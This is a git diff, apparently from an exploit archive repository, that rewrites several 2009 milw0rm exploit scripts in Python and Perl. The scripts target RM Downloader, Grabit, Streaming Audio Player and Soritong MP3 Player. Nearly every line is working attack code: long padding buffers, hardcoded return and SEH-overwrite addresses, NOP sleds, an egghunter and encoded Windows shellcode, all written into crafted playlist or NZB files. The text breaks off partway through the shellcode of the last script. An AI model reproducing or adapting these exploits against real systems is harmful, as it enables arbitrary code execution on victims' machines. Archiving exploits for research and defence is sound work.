+"\x59\x83\xeb\xfc\xe2\xf4\xde\x39\x98\x59\x22\xd1\x57\x1c\x1e\x5a"
+"\xa0\x5c\x5a\xd0\x33\xd2\x6d\xc9\x57\x06\x02\xd0\x37\x10\xa9\xe5"
+"\x57\x58\xcc\xe0\x1c\xc0\x8e\x55\x1c\x2d\x25\x10\x16\x54\x23\x13"
+"\x37\xad\x19\x85\xf8\x5d\x57\x34\x57\x06\x06\xd0\x37\x3f\xa9\xdd"
+"\x97\xd2\x7d\xcd\xdd\xb2\xa9\xcd\x57\x58\xc9\x58\x80\x7d\x26\x12"
+"\xed\x99\x46\x5a\x9c\x69\xa7\x11\xa4\x55\xa9\x91\xd0\xd2\x52\xcd"
+"\x71\xd2\x4a\xd9\x37\x50\xa9\x51\x6c\x59\x22\xd1\x57\x31\x1e\x8e"
+"\xed\xaf\x42\x87\x55\xa1\xa1\x11\xa7\x09\x4a\x21\x56\x5d\x7d\xb9"
+"\x44\xa7\xa8\xdf\x8b\xa6\xc5\xb2\xbd\x35\x41\xd1\xdc\x59")
+
+#[*] x86/alpha_mixed succeeded with size 126 (iteration=1)
+egghunter=(
+"\x89\xe5\xda\xd9\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x45\x36\x4d\x51\x48\x4a\x4b\x4f\x44\x4f\x51\x52\x46\x32\x42"
+"\x4a\x45\x52\x46\x38\x48\x4d\x46\x4e\x47\x4c\x45\x55\x51\x4a"
+"\x44\x34\x4a\x4f\x48\x38\x47\x34\x50\x5a\x50\x32\x50\x37\x4c"
+"\x4b\x4b\x4a\x4e\x4f\x43\x45\x4b\x5a\x4e\x4f\x42\x55\x4b\x57"
+"\x4b\x4f\x4d\x37\x41\x41")
+
+exploit = buff + shellcode + next_seh + seh + egghunter + "\x90"*7
+
+try:
+ out_file = open("exploit.m3u",'w')
+ out_file.write(exploit+".mp3")
+ out_file.close()
+ raw_input("\nExploit file created!\n")
+except:
+ print "Error"
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/local/8589.py b/platforms/windows/local/8589.py
index 08d90ee4d..5962c0fd8 100755
--- a/platforms/windows/local/8589.py
+++ b/platforms/windows/local/8589.py
@@ -1,37 +1,37 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " RM Downloader (.smi) Local Stack Overflow\n"
-print " Exploit code: ThE g0bL!N"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friend\n"
-print "**************************************************************************"
-
-buff = "\x41" * 26083
-jump = "\x5D\x38\x82\x7C" # jmp esp kernel32.dll
-nops = "\x90"*6
-
-# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b"
-"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3"
-"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff"
-"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb"
-"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0"
-"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92"
-"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d"
-"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde"
-"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2"
-"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6")
-
-
-exploit = buff + jump + nops + shellcode
-
-try:
- out_file = open("exploit.smi",'w')
- out_file.write(exploit+"\r\n")
- out_file.close()
- raw_input("\nExploit file created!\n")
-except:
- print "Error"
-
-# milw0rm.com [2009-05-01]
+#usage: exploit.py
+print "**************************************************************************"
+print " RM Downloader (.smi) Local Stack Overflow\n"
+print " Exploit code: ThE g0bL!N"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friend\n"
+print "**************************************************************************"
+
+buff = "\x41" * 26083
+jump = "\x5D\x38\x82\x7C" # jmp esp kernel32.dll
+nops = "\x90"*6
+
+# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b"
+"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3"
+"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff"
+"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb"
+"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0"
+"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92"
+"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d"
+"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde"
+"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2"
+"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6")
+
+
+exploit = buff + jump + nops + shellcode
+
+try:
+ out_file = open("exploit.smi",'w')
+ out_file.write(exploit+"\r\n")
+ out_file.close()
+ raw_input("\nExploit file created!\n")
+except:
+ print "Error"
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/local/8594.pl b/platforms/windows/local/8594.pl
index 4f81ecdd5..0971e2d4f 100755
--- a/platforms/windows/local/8594.pl
+++ b/platforms/windows/local/8594.pl
@@ -1,25 +1,25 @@
-#!/usr/bin/perl
-# RM Downloader (.smi File) Universal Overflow Exploit
-use strict;
-use warnings;
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b".
-"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3".
-"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff".
-"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb".
-"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0".
-"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92".
-"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d".
-"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde".
-"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2".
-"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6";
-my $junk = "\x41" x 26076;
-my $eip = "\x17\x48\xF8\x01"; # Universall Ret Adress
-my $nops = "\x90" x 24;
-open(my $playlist, "> spl.smi");
-print $playlist
- $junk.$eip.$nops.$shellcode.$junk.
- "\r\n";
-close $playlist;
-
-# milw0rm.com [2009-05-01]
+#!/usr/bin/perl
+# RM Downloader (.smi File) Universal Overflow Exploit
+use strict;
+use warnings;
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b".
+"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3".
+"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff".
+"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb".
+"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0".
+"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92".
+"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d".
+"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde".
+"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2".
+"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6";
+my $junk = "\x41" x 26076;
+my $eip = "\x17\x48\xF8\x01"; # Universall Ret Adress
+my $nops = "\x90" x 24;
+open(my $playlist, "> spl.smi");
+print $playlist
+ $junk.$eip.$nops.$shellcode.$junk.
+ "\r\n";
+close $playlist;
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/local/8612.pl b/platforms/windows/local/8612.pl
index 475183362..2a814e4ea 100755
--- a/platforms/windows/local/8612.pl
+++ b/platforms/windows/local/8612.pl
@@ -1,36 +1,36 @@
-#!/usr/bin/perl
-# Grabit<=1.7.2 Beta 3 (.nzb) SEH Overwrite Exploit
-# Coded by: Gaurav Baruah
-# Discovery: Niels Teusink
-#http://packetstormsecurity.org/filedesc/grabit-overflow.txt.html
-# Greetz to Vivek
-#Tested on XP SP3 and XP SP2 (en)
-my $header1=
-"<?xml version=\"1.0\"?>
-<!DOCTYPE nzb
- PUBLIC \"-//newzBin//DTD NZB 1.0//EN\"
- \"";
-
-my $shellcode=
-"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".
-"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73".
-"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f".
-"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b".
-"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50".
-"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12".
-"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd".
-"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e".
-"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32".
-"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36";
-
-my $next_seh = "\xEB\x06\x90\x90";
-my $seh = "\xE5\x56\x01\x10" ; #libeay32.dll
-my $file = "test.nzb";
-
-open (nzb, ">./$file") || die "\nCan't open $file: $!";
-print nzb "$header1" . "\x41" x 248 . "$next_seh" . "$seh" . "$shellcode";
-close (nzb);
-sleep 1;
-print "\nFile $file successfully created!\n";
-
-# milw0rm.com [2009-05-05]
+#!/usr/bin/perl
+# Grabit<=1.7.2 Beta 3 (.nzb) SEH Overwrite Exploit
+# Coded by: Gaurav Baruah
+# Discovery: Niels Teusink
+#http://packetstormsecurity.org/filedesc/grabit-overflow.txt.html
+# Greetz to Vivek
+#Tested on XP SP3 and XP SP2 (en)
+my $header1=
+"<?xml version=\"1.0\"?>
+<!DOCTYPE nzb
+ PUBLIC \"-//newzBin//DTD NZB 1.0//EN\"
+ \"";
+
+my $shellcode=
+"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".
+"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73".
+"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f".
+"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b".
+"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50".
+"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12".
+"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd".
+"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e".
+"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32".
+"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36";
+
+my $next_seh = "\xEB\x06\x90\x90";
+my $seh = "\xE5\x56\x01\x10" ; #libeay32.dll
+my $file = "test.nzb";
+
+open (nzb, ">./$file") || die "\nCan't open $file: $!";
+print nzb "$header1" . "\x41" x 248 . "$next_seh" . "$seh" . "$shellcode";
+close (nzb);
+sleep 1;
+print "\nFile $file successfully created!\n";
+
+# milw0rm.com [2009-05-05]
diff --git a/platforms/windows/local/8620.pl b/platforms/windows/local/8620.pl
index 1fd225035..dab92e14a 100755
--- a/platforms/windows/local/8620.pl
+++ b/platforms/windows/local/8620.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# Streaming Audio Player 0.9 (.M3U File) Local Stack Core Exploit
-# Credit : http://www.milw0rm.com/exploits/8617 cyber-zone
-# By Stack
-# Tested On WinSp2 En / FR
-use strict;
-use warnings;
-my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x68\x74\x74\x70\x3A\x2F\x2F";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $junk = "\x41" x 512;
-my $eip = "\xD7\x98\x95\x7C";
-my $nops = "\x90" x 24;
-open(my $playlist, "> spl.m3u");
-print $playlist
- $junk.$eip.$nops.$shellcode.
- "\r\n";
-close $playlist;
-
-# milw0rm.com [2009-05-05]
+#!/usr/bin/perl
+# Streaming Audio Player 0.9 (.M3U File) Local Stack Core Exploit
+# Credit : http://www.milw0rm.com/exploits/8617 cyber-zone
+# By Stack
+# Tested On WinSp2 En / FR
+use strict;
+use warnings;
+my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x68\x74\x74\x70\x3A\x2F\x2F";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $junk = "\x41" x 512;
+my $eip = "\xD7\x98\x95\x7C";
+my $nops = "\x90" x 24;
+open(my $playlist, "> spl.m3u");
+print $playlist
+ $junk.$eip.$nops.$shellcode.
+ "\r\n";
+close $playlist;
+
+# milw0rm.com [2009-05-05]
diff --git a/platforms/windows/local/8624.pl b/platforms/windows/local/8624.pl
index a6c52e3aa..c54d2b831 100755
--- a/platforms/windows/local/8624.pl
+++ b/platforms/windows/local/8624.pl
@@ -1,40 +1,40 @@
-#!/usr/bin/perl
-# Soritong MP3 Player 1.0 Seh Overwrite Exploit
-# http://www.sorinara.com/soritong/soritong10.exe
-use strict;
-use warnings;
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $junk = "\x41" x 260;
-my $next_seh="\xeb\x06\x90\x90";
-my $seh = "\x44\x25\xD1\x72"; #
-my $nops = "\x90" x 50;
-my $nopsled = "\x90" x 20;
-open(my $playlist, "> seh_exploit.m3u");
-print $playlist
- $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
- "\r\n";
-close $playlist;
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+# Soritong MP3 Player 1.0 Seh Overwrite Exploit
+# http://www.sorinara.com/soritong/soritong10.exe
+use strict;
+use warnings;
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $junk = "\x41" x 260;
+my $next_seh="\xeb\x06\x90\x90";
+my $seh = "\x44\x25\xD1\x72"; #
+my $nops = "\x90" x 50;
+my $nopsled = "\x90" x 20;
+open(my $playlist, "> seh_exploit.m3u");
+print $playlist
+ $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
+ "\r\n";
+close $playlist;
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8628.pl b/platforms/windows/local/8628.pl
index 2f2c55641..779bdb7a1 100755
--- a/platforms/windows/local/8628.pl
+++ b/platforms/windows/local/8628.pl
@@ -1,50 +1,50 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ RM Downloader 3.0.0.9 ]....................... - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on "Windows XP SP2"... [:-) - -=cut - -my $MSD = "rtsp://"."G" x 26117; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". - "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". 
